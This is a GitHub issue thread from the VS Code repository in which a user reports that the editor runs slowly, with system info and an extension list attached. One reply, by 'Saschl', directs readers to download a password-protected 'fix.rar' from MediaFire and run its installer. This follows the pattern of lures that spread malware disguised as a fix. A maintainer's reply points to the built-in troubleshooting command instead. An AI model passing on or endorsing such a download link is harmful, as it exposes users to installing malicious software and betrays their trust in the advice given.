### ISSUE TITLE
slows the vs code

### ISSUE THREAD

**Issue by lxroy** [microsoft/vscode#226638]
Type: <b>Bug</b>

this issue is slowing my vs code

VS Code version: Code 1.92.2 (Universal) (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Darwin arm64 23.5.0
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|Apple M1 (8 x 2400)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|10, 5, 3|
|Memory (System)|8.00GB (0.06GB free)|
|Process Argv|--crash-reporter-id 01e48ada-eebb-4348-becd-d21ed120d401|
|Screen Reader|no|
|VM|0%|
</details><details><summary>Extensions (28)</summary>

Extension|Author (truncated)|Version
---|---|---
vscode-tailwindcss|bra|0.12.7
javascript-extensions-pack---js-essentials|Bre|0.0.2
npm-intellisense|chr|1.4.5
path-intellisense|chr|2.9.0
vscode-eslint|dba|3.0.10
githistory|don|0.6.20
es7-react-js-snippets|dsz|4.4.3
gitlens|eam|15.3.1
prettier-vscode|esb|11.0.0
auto-rename-tag|for|0.1.10
code-runner|for|0.12.2
codespaces|Git|1.17.2
next-js-ts-snippets|loc|2.0.3
auto-commit-msg|Mic|0.27.0
remote-wsl|ms-|0.88.2
vscode-typescript-next|ms-|5.7.20240825
vscode-extension-auto-import|Nuc|1.4.3
material-icon-theme|PKi|5.9.0
vscode-css-peek|pra|4.4.1
prisma|Pri|5.18.0
nextjs-snippets|Pul|1.0.2
LiveServer|rit|5.7.9
code-spell-checker|str|3.0.1
tabnine-vscode|Tab|3.146.0
intellicode-api-usage-examples|Vis|0.2.8
vscodeintellicode|Vis|1.3.1
vscode-backup|Wes|0.0.6
nextjs|Wil|0.0.8

</details><details>
<summary>A/B Experiments</summary>

```
vsliv368cf:30146710
vspor879:30202332
vspor708:30202333
vspor363:30204092
vscod805:30301674
binariesv615:30325510
vsaa593cf:30376535
py29gd2263:31024239
c4g48928:30535728
azure-dev_surveyone:30548225
a9j8j154:30646983
962ge761:30959799
pythongtdpath:30769146
welcomedialogc:30910334
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
h48ei257:31000450
pythontbext0:30879054
accentitlementst:30995554
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
g316j359:31013175
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupytercf:31046870
2f103344:31071589
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
flightc:31119335
wkspc-onlycs-t:31111718
fje88620:31121564

```

</details>

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lramos15** [comment]
`F1 -> Troubleshoot issue`
